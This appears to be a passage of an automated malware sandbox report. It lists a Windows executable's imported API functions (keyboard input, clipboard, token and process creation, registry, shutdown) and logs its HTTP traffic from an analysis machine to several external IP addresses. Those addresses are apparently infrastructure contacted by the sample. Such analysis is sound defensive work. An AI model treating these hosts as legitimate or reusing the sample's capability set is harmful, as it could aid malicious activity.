GetOEMCP, IsValidCodePage, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetModuleFileNameA, HeapReAlloc, HeapCreate, SetHandleCount, GetFileType, GetStartupInfoA, SetStdHandle, GetConsoleCP, GetConsoleMode, LCMapStringW, LCMapStringA, RtlUnwind, SetFilePointer, GetTimeZoneInformation, GetTimeFormatA, GetDateFormatA, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, GetTickCount, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, GetModuleHandleA, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, CreateFileA, SetEndOfFile, EnumResourceNamesW, SetEnvironmentVariableA
USER32.dll | SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, ReleaseCapture, SetCapture, WindowFromPoint, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, CheckMenuRadioItem, CopyImage, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, PeekMessageW, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, GetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, MessageBoxW, DefWindowProcW, MoveWindow, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, GetMenuItemID, TranslateMessage, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, UnregisterHotKey, CharLowerBuffW, MonitorFromRect, keybd_event, LoadImageW, GetWindowLongW
GDI32.dll | DeleteObject, GetObjectW, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, PolyDraw, BeginPath, Rectangle, GetDeviceCaps, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, CreateDCW, GetPixel, DeleteDC, SetViewportOrgEx
COMDLG32.dll | GetSaveFileNameW, GetOpenFileNameW
ADVAPI32.dll | RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegConnectRegistryW, RegEnumKeyExW, CloseServiceHandle, UnlockServiceDatabase, LockServiceDatabase, OpenSCManagerW, InitiateSystemShutdownExW, AdjustTokenPrivileges, RegCloseKey, RegQueryValueExW, RegOpenKeyExW, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, InitializeSecurityDescriptor, InitializeAcl, GetLengthSid, SetSecurityDescriptorDacl, CopySid, LogonUserW, GetTokenInformation, GetAclInformation, GetAce, AddAce, GetSecurityDescriptorDacl
SHELL32.dll | DragQueryPoint, ShellExecuteExW, SHGetFolderPathW, DragQueryFileW, SHEmptyRecycleBinW, SHBrowseForFolderW, SHFileOperationW, SHGetPathFromIDListW, SHGetDesktopFolder, SHGetMalloc, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll | OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoInitialize, CoUninitialize, CoCreateInstance, CreateStreamOnHGlobal, CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, StringFromCLSID, IIDFromString, StringFromIID, OleInitialize, CreateBindCtx, CLSIDFromProgID, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket, OleUninitialize
OLEAUT32.dll | SafeArrayAllocData, SafeArrayAllocDescriptorEx, SysAllocString, OleLoadPicture, SafeArrayGetVartype, SafeArrayDestroyData, SafeArrayAccessData, VarR8FromDec, VariantTimeToSystemTime, VariantClear, VariantCopy, VariantInit, SafeArrayDestroyDescriptor, LoadRegTypeLib, GetActiveObject, SafeArrayUnaccessData
Language of compilation system | Country where language is spoken | Map
English | Great Britain |
English | United States |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                              Nov 5, 2024 15:34:38.385730028 CET8049751161.97.142.144192.168.11.20
                                                                                                              Nov 5, 2024 15:34:38.386058092 CET4975180192.168.11.20161.97.142.144
                                                                                                              Nov 5, 2024 15:34:38.393518925 CET4975180192.168.11.20161.97.142.144
                                                                                                              Nov 5, 2024 15:34:38.587743998 CET8049751161.97.142.144192.168.11.20
                                                                                                              Nov 5, 2024 15:34:38.588337898 CET8049751161.97.142.144192.168.11.20
                                                                                                              Nov 5, 2024 15:34:38.588388920 CET8049751161.97.142.144192.168.11.20
                                                                                                              Nov 5, 2024 15:34:38.588427067 CET8049751161.97.142.144192.168.11.20
                                                                                                              Nov 5, 2024 15:34:38.588552952 CET4975180192.168.11.20161.97.142.144
                                                                                                              Nov 5, 2024 15:34:38.588618040 CET4975180192.168.11.20161.97.142.144
                                                                                                              Nov 5, 2024 15:34:39.901828051 CET4975180192.168.11.20161.97.142.144
                                                                                                              Nov 5, 2024 15:34:40.919292927 CET4975280192.168.11.20161.97.142.144
                                                                                                              Nov 5, 2024 15:34:41.109736919 CET8049752161.97.142.144192.168.11.20
                                                                                                              Nov 5, 2024 15:34:41.110346079 CET4975280192.168.11.20161.97.142.144
                                                                                                              Nov 5, 2024 15:34:41.117851019 CET4975280192.168.11.20161.97.142.144
                                                                                                              Nov 5, 2024 15:34:41.308593988 CET8049752161.97.142.144192.168.11.20
                                                                                                              Nov 5, 2024 15:34:41.308635950 CET8049752161.97.142.144192.168.11.20
                                                                                                              Nov 5, 2024 15:34:41.308665991 CET8049752161.97.142.144192.168.11.20
                                                                                                              Nov 5, 2024 15:34:41.309434891 CET8049752161.97.142.144192.168.11.20
                                                                                                              Nov 5, 2024 15:34:41.309484959 CET8049752161.97.142.144192.168.11.20
                                                                                                              Nov 5, 2024 15:34:41.309515953 CET8049752161.97.142.144192.168.11.20
                                                                                                              Nov 5, 2024 15:34:41.309551001 CET8049752161.97.142.144192.168.11.20
                                                                                                              Nov 5, 2024 15:34:41.309600115 CET4975280192.168.11.20161.97.142.144
                                                                                                              Nov 5, 2024 15:34:41.309768915 CET4975280192.168.11.20161.97.142.144
                                                                                                              Nov 5, 2024 15:34:42.620102882 CET4975280192.168.11.20161.97.142.144
                                                                                                              Nov 5, 2024 15:34:43.637806892 CET4975380192.168.11.20161.97.142.144
                                                                                                              Nov 5, 2024 15:34:43.825099945 CET8049753161.97.142.144192.168.11.20
                                                                                                              Nov 5, 2024 15:34:43.825422049 CET4975380192.168.11.20161.97.142.144
                                                                                                              Nov 5, 2024 15:34:43.830497980 CET4975380192.168.11.20161.97.142.144
                                                                                                              Nov 5, 2024 15:34:44.022325993 CET8049753161.97.142.144192.168.11.20
                                                                                                              Nov 5, 2024 15:34:44.022392035 CET8049753161.97.142.144192.168.11.20
                                                                                                              Nov 5, 2024 15:34:44.022435904 CET8049753161.97.142.144192.168.11.20
                                                                                                              Nov 5, 2024 15:34:44.022479057 CET8049753161.97.142.144192.168.11.20
                                                                                                              Nov 5, 2024 15:34:44.023041010 CET4975380192.168.11.20161.97.142.144
                                                                                                              Nov 5, 2024 15:34:44.023041964 CET4975380192.168.11.20161.97.142.144
                                                                                                              Nov 5, 2024 15:34:44.026194096 CET4975380192.168.11.20161.97.142.144
                                                                                                              Nov 5, 2024 15:34:44.213150978 CET8049753161.97.142.144192.168.11.20
                                                                                                              Nov 5, 2024 15:34:49.970376968 CET4975480192.168.11.20119.18.54.27
                                                                                                              Nov 5, 2024 15:34:50.385801077 CET8049754119.18.54.27192.168.11.20
                                                                                                              Nov 5, 2024 15:34:50.386056900 CET4975480192.168.11.20119.18.54.27
                                                                                                              Nov 5, 2024 15:34:50.393707991 CET4975480192.168.11.20119.18.54.27
                                                                                                              Nov 5, 2024 15:34:50.804150105 CET8049754119.18.54.27192.168.11.20
                                                                                                              Nov 5, 2024 15:34:50.887130976 CET8049754119.18.54.27192.168.11.20
                                                                                                              Nov 5, 2024 15:34:50.887139082 CET8049754119.18.54.27192.168.11.20
                                                                                                              Nov 5, 2024 15:34:50.887347937 CET4975480192.168.11.20119.18.54.27
                                                                                                              Nov 5, 2024 15:34:51.899182081 CET4975480192.168.11.20119.18.54.27
                                                                                                              Nov 5, 2024 15:34:52.916717052 CET4975580192.168.11.20119.18.54.27
                                                                                                              Nov 5, 2024 15:34:53.327476978 CET8049755119.18.54.27192.168.11.20
                                                                                                              Nov 5, 2024 15:34:53.327667952 CET4975580192.168.11.20119.18.54.27
                                                                                                              Nov 5, 2024 15:34:53.335347891 CET4975580192.168.11.20119.18.54.27
                                                                                                              Nov 5, 2024 15:34:53.467674971 CET80497463.33.130.190192.168.11.20
                                                                                                              Nov 5, 2024 15:34:53.467825890 CET4974680192.168.11.203.33.130.190
                                                                                                              Nov 5, 2024 15:34:53.748405933 CET8049755119.18.54.27192.168.11.20
                                                                                                              Nov 5, 2024 15:34:53.830602884 CET8049755119.18.54.27192.168.11.20
                                                                                                              Nov 5, 2024 15:34:53.830653906 CET8049755119.18.54.27192.168.11.20
                                                                                                              Nov 5, 2024 15:34:53.830801010 CET4975580192.168.11.20119.18.54.27
                                                                                                              Nov 5, 2024 15:34:54.851619959 CET4975580192.168.11.20119.18.54.27
                                                                                                              Nov 5, 2024 15:34:55.868999004 CET4975680192.168.11.20119.18.54.27
                                                                                                              Nov 5, 2024 15:34:56.300585032 CET8049756119.18.54.27192.168.11.20
                                                                                                              Nov 5, 2024 15:34:56.300745964 CET4975680192.168.11.20119.18.54.27
                                                                                                              Nov 5, 2024 15:34:56.308614016 CET4975680192.168.11.20119.18.54.27
                                                                                                              Nov 5, 2024 15:34:56.308661938 CET4975680192.168.11.20119.18.54.27
                                                                                                              Nov 5, 2024 15:34:56.308712006 CET4975680192.168.11.20119.18.54.27
                                                                                                              Nov 5, 2024 15:34:56.736937046 CET8049756119.18.54.27192.168.11.20
                                                                                                              Nov 5, 2024 15:34:56.766845942 CET8049756119.18.54.27192.168.11.20
                                                                                                              Nov 5, 2024 15:34:56.766853094 CET8049756119.18.54.27192.168.11.20
                                                                                                              Nov 5, 2024 15:34:56.767004013 CET4975680192.168.11.20119.18.54.27
                                                                                                              Nov 5, 2024 15:34:57.819632053 CET4975680192.168.11.20119.18.54.27
                                                                                                              Nov 5, 2024 15:34:58.837135077 CET4975780192.168.11.20119.18.54.27
                                                                                                              Nov 5, 2024 15:34:59.263602018 CET8049757119.18.54.27192.168.11.20
                                                                                                              Nov 5, 2024 15:34:59.263816118 CET4975780192.168.11.20119.18.54.27
                                                                                                              Nov 5, 2024 15:34:59.268990040 CET4975780192.168.11.20119.18.54.27
                                                                                                              Nov 5, 2024 15:34:59.718198061 CET8049757119.18.54.27192.168.11.20
                                                                                                              Nov 5, 2024 15:34:59.775443077 CET8049757119.18.54.27192.168.11.20
                                                                                                              Nov 5, 2024 15:34:59.775590897 CET8049757119.18.54.27192.168.11.20
                                                                                                              Nov 5, 2024 15:34:59.775933981 CET4975780192.168.11.20119.18.54.27
                                                                                                              Nov 5, 2024 15:34:59.777746916 CET4975780192.168.11.20119.18.54.27
                                                                                                              Nov 5, 2024 15:35:00.212596893 CET8049757119.18.54.27192.168.11.20
                                                                                                              Nov 5, 2024 15:35:13.370269060 CET4975880192.168.11.20195.110.124.133
                                                                                                              Nov 5, 2024 15:35:13.566570997 CET8049758195.110.124.133192.168.11.20
                                                                                                              Nov 5, 2024 15:35:13.566792011 CET4975880192.168.11.20195.110.124.133
                                                                                                              Nov 5, 2024 15:35:13.574532032 CET4975880192.168.11.20195.110.124.133
                                                                                                              Nov 5, 2024 15:35:13.770561934 CET8049758195.110.124.133192.168.11.20
                                                                                                              Nov 5, 2024 15:35:13.774205923 CET8049758195.110.124.133192.168.11.20
                                                                                                              Nov 5, 2024 15:35:13.774241924 CET8049758195.110.124.133192.168.11.20
                                                                                                              Nov 5, 2024 15:35:13.774586916 CET4975880192.168.11.20195.110.124.133
                                                                                                              Nov 5, 2024 15:35:15.081497908 CET4975880192.168.11.20195.110.124.133
                                                                                                              Nov 5, 2024 15:35:16.099195957 CET4975980192.168.11.20195.110.124.133
                                                                                                              Nov 5, 2024 15:35:16.295698881 CET8049759195.110.124.133192.168.11.20
                                                                                                              Nov 5, 2024 15:35:16.296067953 CET4975980192.168.11.20195.110.124.133
                                                                                                              Nov 5, 2024 15:35:16.304152012 CET4975980192.168.11.20195.110.124.133
                                                                                                              Nov 5, 2024 15:35:16.501244068 CET8049759195.110.124.133192.168.11.20
                                                                                                              Nov 5, 2024 15:35:16.504554033 CET8049759195.110.124.133192.168.11.20
                                                                                                              Nov 5, 2024 15:35:16.505258083 CET8049759195.110.124.133192.168.11.20
                                                                                                              Nov 5, 2024 15:35:16.505439043 CET4975980192.168.11.20195.110.124.133
                                                                                                              Nov 5, 2024 15:35:17.815262079 CET4975980192.168.11.20195.110.124.133
                                                                                                              Nov 5, 2024 15:35:18.832756042 CET4976080192.168.11.20195.110.124.133
                                                                                                              Nov 5, 2024 15:35:19.029460907 CET8049760195.110.124.133192.168.11.20
                                                                                                              Nov 5, 2024 15:35:19.029855967 CET4976080192.168.11.20195.110.124.133
                                                                                                              Nov 5, 2024 15:35:19.042628050 CET4976080192.168.11.20195.110.124.133
                                                                                                              Nov 5, 2024 15:35:19.042659998 CET4976080192.168.11.20195.110.124.133
                                                                                                              Nov 5, 2024 15:35:19.238778114 CET8049760195.110.124.133192.168.11.20
                                                                                                              Nov 5, 2024 15:35:19.238910913 CET8049760195.110.124.133192.168.11.20
                                                                                                              Nov 5, 2024 15:35:19.245040894 CET8049760195.110.124.133192.168.11.20
                                                                                                              Nov 5, 2024 15:35:19.245155096 CET8049760195.110.124.133192.168.11.20
                                                                                                              Nov 5, 2024 15:35:19.245332956 CET4976080192.168.11.20195.110.124.133
                                                                                                              Nov 5, 2024 15:35:20.549093008 CET4976080192.168.11.20195.110.124.133
                                                                                                              Nov 5, 2024 15:35:21.566574097 CET4976180192.168.11.20195.110.124.133
                                                                                                              Nov 5, 2024 15:35:21.763252020 CET8049761195.110.124.133192.168.11.20
                                                                                                              Nov 5, 2024 15:35:21.763510942 CET4976180192.168.11.20195.110.124.133
                                                                                                              Nov 5, 2024 15:35:21.771250010 CET4976180192.168.11.20195.110.124.133
                                                                                                              Nov 5, 2024 15:35:21.967551947 CET8049761195.110.124.133192.168.11.20
                                                                                                              Nov 5, 2024 15:35:21.972999096 CET8049761195.110.124.133192.168.11.20
                                                                                                              Nov 5, 2024 15:35:21.973069906 CET8049761195.110.124.133192.168.11.20
                                                                                                              Nov 5, 2024 15:35:21.973316908 CET4976180192.168.11.20195.110.124.133
                                                                                                              Nov 5, 2024 15:35:21.975146055 CET4976180192.168.11.20195.110.124.133
                                                                                                              Nov 5, 2024 15:35:22.171837091 CET8049761195.110.124.133192.168.11.20
                                                                                                              Nov 5, 2024 15:35:27.108392954 CET4976280192.168.11.20203.161.41.204
                                                                                                              Nov 5, 2024 15:35:27.288279057 CET8049762203.161.41.204192.168.11.20
                                                                                                              Nov 5, 2024 15:35:27.288502932 CET4976280192.168.11.20203.161.41.204
                                                                                                              Nov 5, 2024 15:35:27.296200037 CET4976280192.168.11.20203.161.41.204
                                                                                                              Nov 5, 2024 15:35:27.482917070 CET8049762203.161.41.204192.168.11.20
                                                                                                              Nov 5, 2024 15:35:27.504525900 CET8049762203.161.41.204192.168.11.20
                                                                                                              Nov 5, 2024 15:35:27.504534006 CET8049762203.161.41.204192.168.11.20
                                                                                                              Nov 5, 2024 15:35:27.504676104 CET4976280192.168.11.20203.161.41.204
                                                                                                              Nov 5, 2024 15:35:28.797281027 CET4976280192.168.11.20203.161.41.204
                                                                                                              Nov 5, 2024 15:35:29.814738989 CET4976380192.168.11.20203.161.41.204
                                                                                                              Nov 5, 2024 15:35:29.990678072 CET8049763203.161.41.204192.168.11.20
                                                                                                              Nov 5, 2024 15:35:29.990895033 CET4976380192.168.11.20203.161.41.204
                                                                                                              Nov 5, 2024 15:35:29.998555899 CET4976380192.168.11.20203.161.41.204
                                                                                                              Nov 5, 2024 15:35:30.174473047 CET8049763203.161.41.204192.168.11.20
                                                                                                              Nov 5, 2024 15:35:30.185868025 CET8049763203.161.41.204192.168.11.20
                                                                                                              Nov 5, 2024 15:35:30.185873985 CET8049763203.161.41.204192.168.11.20
                                                                                                              Nov 5, 2024 15:35:30.186171055 CET4976380192.168.11.20203.161.41.204
                                                                                                              Nov 5, 2024 15:35:30.571814060 CET8049763203.161.41.204192.168.11.20
                                                                                                              Nov 5, 2024 15:35:30.571942091 CET4976380192.168.11.20203.161.41.204
                                                                                                              Nov 5, 2024 15:35:31.499802113 CET4976380192.168.11.20203.161.41.204
                                                                                                              Nov 5, 2024 15:35:32.517275095 CET4976480192.168.11.20203.161.41.204
                                                                                                              Nov 5, 2024 15:35:32.695349932 CET8049764203.161.41.204192.168.11.20
                                                                                                              Nov 5, 2024 15:35:32.695585966 CET4976480192.168.11.20203.161.41.204
                                                                                                              Nov 5, 2024 15:35:32.703387022 CET4976480192.168.11.20203.161.41.204
                                                                                                              Nov 5, 2024 15:35:32.703443050 CET4976480192.168.11.20203.161.41.204
                                                                                                              Nov 5, 2024 15:35:32.703473091 CET4976480192.168.11.20203.161.41.204
                                                                                                              Nov 5, 2024 15:35:32.881875038 CET8049764203.161.41.204192.168.11.20
                                                                                                              Nov 5, 2024 15:35:32.881880999 CET8049764203.161.41.204192.168.11.20
                                                                                                              Nov 5, 2024 15:35:32.881886005 CET8049764203.161.41.204192.168.11.20
                                                                                                              Nov 5, 2024 15:35:32.898757935 CET8049764203.161.41.204192.168.11.20
                                                                                                              Nov 5, 2024 15:35:32.898839951 CET8049764203.161.41.204192.168.11.20
                                                                                                              Nov 5, 2024 15:35:32.899013042 CET4976480192.168.11.20203.161.41.204
                                                                                                              Nov 5, 2024 15:35:34.217979908 CET4976480192.168.11.20203.161.41.204
                                                                                                              Nov 5, 2024 15:35:35.235641956 CET4976580192.168.11.20203.161.41.204
                                                                                                              Nov 5, 2024 15:35:35.411715031 CET8049765203.161.41.204192.168.11.20
                                                                                                              Nov 5, 2024 15:35:35.411978960 CET4976580192.168.11.20203.161.41.204
                                                                                                              Nov 5, 2024 15:35:35.417129993 CET4976580192.168.11.20203.161.41.204
                                                                                                              Nov 5, 2024 15:35:35.593621016 CET8049765203.161.41.204192.168.11.20
                                                                                                              Nov 5, 2024 15:35:35.603905916 CET8049765203.161.41.204192.168.11.20
                                                                                                              Nov 5, 2024 15:35:35.604000092 CET8049765203.161.41.204192.168.11.20
                                                                                                              Nov 5, 2024 15:36:47.001856089 CET4978380192.168.11.2013.248.169.48
                                                                                                              Nov 5, 2024 15:36:47.011559963 CET4978380192.168.11.2013.248.169.48
                                                                                                              Nov 5, 2024 15:36:47.121239901 CET804978313.248.169.48192.168.11.20
                                                                                                              Nov 5, 2024 15:36:47.121478081 CET804978313.248.169.48192.168.11.20
                                                                                                              Nov 5, 2024 15:36:47.121639013 CET4978380192.168.11.2013.248.169.48
                                                                                                              Nov 5, 2024 15:36:48.514239073 CET4978380192.168.11.2013.248.169.48
                                                                                                              Nov 5, 2024 15:36:48.623239040 CET804978313.248.169.48192.168.11.20
                                                                                                              Nov 5, 2024 15:36:49.531749964 CET4978480192.168.11.2013.248.169.48
                                                                                                              Nov 5, 2024 15:36:49.641918898 CET804978413.248.169.48192.168.11.20
                                                                                                              Nov 5, 2024 15:36:49.642262936 CET4978480192.168.11.2013.248.169.48
                                                                                                              Nov 5, 2024 15:36:49.650089025 CET4978480192.168.11.2013.248.169.48
                                                                                                              Nov 5, 2024 15:36:49.650146961 CET4978480192.168.11.2013.248.169.48
                                                                                                              Nov 5, 2024 15:36:49.758795023 CET804978413.248.169.48192.168.11.20
                                                                                                              Nov 5, 2024 15:36:49.759351969 CET804978413.248.169.48192.168.11.20
                                                                                                              Nov 5, 2024 15:36:49.759386063 CET804978413.248.169.48192.168.11.20
                                                                                                              Nov 5, 2024 15:36:49.759408951 CET804978413.248.169.48192.168.11.20
                                                                                                              Nov 5, 2024 15:36:49.759430885 CET804978413.248.169.48192.168.11.20
                                                                                                              Nov 5, 2024 15:36:49.759455919 CET804978413.248.169.48192.168.11.20
                                                                                                              Nov 5, 2024 15:36:49.759479046 CET804978413.248.169.48192.168.11.20
                                                                                                              Nov 5, 2024 15:36:52.171834946 CET4978580192.168.11.2013.248.169.48
                                                                                                              Nov 5, 2024 15:36:52.283277988 CET804978513.248.169.48192.168.11.20
                                                                                                              Nov 5, 2024 15:36:52.283478975 CET4978580192.168.11.2013.248.169.48
                                                                                                              Nov 5, 2024 15:36:52.288631916 CET4978580192.168.11.2013.248.169.48
                                                                                                              Nov 5, 2024 15:36:52.398204088 CET804978513.248.169.48192.168.11.20
                                                                                                              Nov 5, 2024 15:36:52.399775028 CET804978513.248.169.48192.168.11.20
                                                                                                              Nov 5, 2024 15:36:52.399818897 CET804978513.248.169.48192.168.11.20
                                                                                                              Nov 5, 2024 15:36:52.400037050 CET4978580192.168.11.2013.248.169.48
                                                                                                              Nov 5, 2024 15:36:52.401878119 CET4978580192.168.11.2013.248.169.48
                                                                                                              Nov 5, 2024 15:36:52.511255026 CET804978513.248.169.48192.168.11.20
                                                                                                              Nov 5, 2024 15:37:06.704945087 CET4978680192.168.11.2015.197.148.33
                                                                                                              Nov 5, 2024 15:37:06.813395977 CET804978615.197.148.33192.168.11.20
                                                                                                              Nov 5, 2024 15:37:06.813647985 CET4978680192.168.11.2015.197.148.33
                                                                                                              Nov 5, 2024 15:37:06.821808100 CET4978680192.168.11.2015.197.148.33
                                                                                                              Nov 5, 2024 15:37:06.930212975 CET804978615.197.148.33192.168.11.20
                                                                                                              Nov 5, 2024 15:37:08.338104963 CET4978680192.168.11.2015.197.148.33
                                                                                                              Nov 5, 2024 15:37:08.487034082 CET804978615.197.148.33192.168.11.20
                                                                                                              Nov 5, 2024 15:37:09.355752945 CET4978780192.168.11.2015.197.148.33
                                                                                                              Nov 5, 2024 15:37:09.463982105 CET804978715.197.148.33192.168.11.20
                                                                                                              Nov 5, 2024 15:37:09.464241028 CET4978780192.168.11.2015.197.148.33
                                                                                                              Nov 5, 2024 15:37:09.471915960 CET4978780192.168.11.2015.197.148.33
                                                                                                              Nov 5, 2024 15:37:09.580096006 CET804978715.197.148.33192.168.11.20
                                                                                                              Nov 5, 2024 15:37:09.581113100 CET804978715.197.148.33192.168.11.20
                                                                                                              Nov 5, 2024 15:37:09.581393003 CET4978780192.168.11.2015.197.148.33
                                                                                                              Nov 5, 2024 15:37:10.978121042 CET4978780192.168.11.2015.197.148.33
                                                                                                              Nov 5, 2024 15:37:11.085989952 CET804978715.197.148.33192.168.11.20
                                                                                                              Nov 5, 2024 15:37:11.995568037 CET4978880192.168.11.2015.197.148.33
                                                                                                              Nov 5, 2024 15:37:12.104183912 CET804978815.197.148.33192.168.11.20
                                                                                                              Nov 5, 2024 15:37:12.104348898 CET4978880192.168.11.2015.197.148.33
                                                                                                              Nov 5, 2024 15:37:12.112953901 CET4978880192.168.11.2015.197.148.33
                                                                                                              Nov 5, 2024 15:37:12.113018990 CET4978880192.168.11.2015.197.148.33
                                                                                                              Nov 5, 2024 15:37:12.221524000 CET804978815.197.148.33192.168.11.20
                                                                                                              Nov 5, 2024 15:37:12.221599102 CET804978815.197.148.33192.168.11.20
                                                                                                              Nov 5, 2024 15:37:12.221628904 CET804978815.197.148.33192.168.11.20
                                                                                                              Nov 5, 2024 15:37:12.221654892 CET804978815.197.148.33192.168.11.20
                                                                                                              Nov 5, 2024 15:37:12.221700907 CET804978815.197.148.33192.168.11.20
                                                                                                              Nov 5, 2024 15:37:12.221728086 CET804978815.197.148.33192.168.11.20
                                                                                                              Nov 5, 2024 15:37:12.221966982 CET804978815.197.148.33192.168.11.20
                                                                                                              Nov 5, 2024 15:37:12.222765923 CET804978815.197.148.33192.168.11.20
                                                                                                              Nov 5, 2024 15:37:12.223040104 CET4978880192.168.11.2015.197.148.33
                                                                                                              Nov 5, 2024 15:37:13.618174076 CET4978880192.168.11.2015.197.148.33
                                                                                                              Nov 5, 2024 15:37:13.726573944 CET804978815.197.148.33192.168.11.20
                                                                                                              Nov 5, 2024 15:37:14.029328108 CET804978615.197.148.33192.168.11.20
                                                                                                              Nov 5, 2024 15:37:14.029486895 CET4978680192.168.11.2015.197.148.33
                                                                                                              Nov 5, 2024 15:37:14.635885000 CET4978980192.168.11.2015.197.148.33
                                                                                                              Nov 5, 2024 15:37:14.743885994 CET804978915.197.148.33192.168.11.20
                                                                                                              Nov 5, 2024 15:37:14.744147062 CET4978980192.168.11.2015.197.148.33
                                                                                                              Nov 5, 2024 15:37:14.749298096 CET4978980192.168.11.2015.197.148.33
                                                                                                              Nov 5, 2024 15:37:14.857198954 CET804978915.197.148.33192.168.11.20
                                                                                                              Nov 5, 2024 15:37:14.859739065 CET804978915.197.148.33192.168.11.20
                                                                                                              Nov 5, 2024 15:37:14.859783888 CET804978915.197.148.33192.168.11.20
                                                                                                              Nov 5, 2024 15:37:14.860120058 CET4978980192.168.11.2015.197.148.33
                                                                                                              Nov 5, 2024 15:37:14.861934900 CET4978980192.168.11.2015.197.148.33
                                                                                                              Nov 5, 2024 15:37:14.864253998 CET804978915.197.148.33192.168.11.20
                                                                                                              Nov 5, 2024 15:37:14.864461899 CET4978980192.168.11.2015.197.148.33
                                                                                                              Nov 5, 2024 15:37:14.969794035 CET804978915.197.148.33192.168.11.20
                                                                                                              Nov 5, 2024 15:37:22.946366072 CET4979080192.168.11.20104.21.94.87
                                                                                                              Nov 5, 2024 15:37:23.048924923 CET8049790104.21.94.87192.168.11.20
                                                                                                              Nov 5, 2024 15:37:23.049195051 CET4979080192.168.11.20104.21.94.87
                                                                                                              Nov 5, 2024 15:37:23.054768085 CET4979080192.168.11.20104.21.94.87
                                                                                                              Nov 5, 2024 15:37:23.157346964 CET8049790104.21.94.87192.168.11.20
                                                                                                              Nov 5, 2024 15:37:23.683861017 CET8049790104.21.94.87192.168.11.20
                                                                                                              Nov 5, 2024 15:37:23.683919907 CET8049790104.21.94.87192.168.11.20
                                                                                                              Nov 5, 2024 15:37:23.683989048 CET8049790104.21.94.87192.168.11.20
                                                                                                              Nov 5, 2024 15:37:23.684032917 CET8049790104.21.94.87192.168.11.20
                                                                                                              Nov 5, 2024 15:37:23.684075117 CET8049790104.21.94.87192.168.11.20
                                                                                                              Nov 5, 2024 15:37:23.684114933 CET8049790104.21.94.87192.168.11.20
                                                                                                              Nov 5, 2024 15:37:23.684155941 CET8049790104.21.94.87192.168.11.20
                                                                                                              Nov 5, 2024 15:37:23.684184074 CET8049790104.21.94.87192.168.11.20
                                                                                                              Nov 5, 2024 15:37:23.684211969 CET8049790104.21.94.87192.168.11.20
                                                                                                              Nov 5, 2024 15:37:23.684226990 CET4979080192.168.11.20104.21.94.87
                                                                                                              Nov 5, 2024 15:37:23.684398890 CET4979080192.168.11.20104.21.94.87
                                                                                                              Nov 5, 2024 15:37:23.684573889 CET4979080192.168.11.20104.21.94.87
                                                                                                              Nov 5, 2024 15:37:23.685767889 CET8049790104.21.94.87192.168.11.20
                                                                                                              Nov 5, 2024 15:37:23.686008930 CET4979080192.168.11.20104.21.94.87
                                                                                                              Nov 5, 2024 15:37:23.687426090 CET4979080192.168.11.20104.21.94.87
                                                                                                              Nov 5, 2024 15:37:23.789812088 CET8049790104.21.94.87192.168.11.20
                                                                                                              Nov 5, 2024 15:37:28.695166111 CET4979180192.168.11.2066.198.240.15
                                                                                                              Nov 5, 2024 15:37:28.813013077 CET804979166.198.240.15192.168.11.20
                                                                                                              Nov 5, 2024 15:37:28.813224077 CET4979180192.168.11.2066.198.240.15
